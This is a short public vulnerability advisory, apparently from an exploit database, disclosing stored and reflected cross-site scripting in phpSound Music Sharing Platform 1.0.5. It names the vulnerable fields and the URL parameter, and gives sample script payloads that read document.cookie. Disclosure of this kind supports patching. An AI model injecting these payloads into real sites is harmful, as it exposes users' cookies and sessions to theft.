phpSound Music Sharing Platform 1.0.5 Cross Site Scripting

2014-11-14 / 2014-11-19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: phpSound Music Sharing Platform Multiple XSS Vulnerabilities # Date: 08-10-2014 # Exploit Author: Halil Dalabasmaz # Version: v1.0.5 # Vendor Link: http://codecanyon.net/item/phpsound-music-sharing-platform/9016117 # Software Test Link: http://phpsound.com/demo # Vulnerabilities Description: ===Stored XSS=== Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields. Sample Payload for Stored XSS: "><script>alert(document.cookie);</script> Solution Filter the input fields aganist to XSS attacks. === ===Reflected XSS=== The URL parameter is "filter" not filtered. http://server/path/index.php?a=explore&filter=XSS Sample Payload for XSS: </title><script>alert(document.cookie);</script> Solution Filter the parameter aganist to XSS attacks. ===


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top